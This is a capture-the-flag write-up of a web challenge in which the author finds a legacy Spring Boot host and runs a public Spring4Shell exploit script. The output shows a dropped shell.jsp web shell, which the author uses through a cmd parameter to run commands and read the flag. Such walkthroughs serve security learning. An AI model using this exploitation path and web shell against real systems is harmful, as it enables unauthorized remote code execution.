Statement: Oook! That’s a hard one! I just want to buy some tubes, but I think that the main site is disabled… What now?
For this challenge, the website has nothing interesting except the information in the footer:
<footer>
<p>For the complete functionality of the page add the following entries to your DNS configuration and use tube.com:PORT to connect to the platform.<br>
34.65.33.171 tube.com<br>
34.65.33.171 legacy.tube.com<br>
DO NOT USE THIS IN PRODUCTION!</p>
</footer>
I add on my local machine in the file /etc/hosts the following entries:
34.65.33.171 tube.com
34.65.33.171 legacy.tube.com
Now, the website with the domain name legacy.tube.com seems interesting. We can see in the HTML source code the following comment:
<!--
Important!
Due to the recent discovery of a major vulnerability of the used framework, this platform is now deprecated (more information at /info).
It remains available only for backward compatibility reasons.
DO NOT USE THIS PLATFORM IN PRODUCTION!
-->
So I go to the following URL: http://legacy.tube.com:49445/info
DEVELOPER: Mark Doe
FRAMEWORK: spring-boot
TAG: COMPROMISED
DATE: 30.03.2022
CURRENT_STATUS: patch in devlopment
This page tells us that the spring-boot version is compromised.
After some research, I find a git repo to get a webshell with spring4shell exploit.
POC of exploit :
python exploit.py --url "http://legacy.tube.com:49445" ──(dim.,juil.31)─┘
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://legacy.tube.com:49445/shell.jsp?cmd=id
By going to the given URL, we can perform RCE with the parameter cmd:
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) //
A ls&cat allows us to get back the flag.
Flag : TFCCTF{F*_$pr1nG!_I_m_m0R3_0f_4_w1nt3r_p3r$0n_aNyw4y!}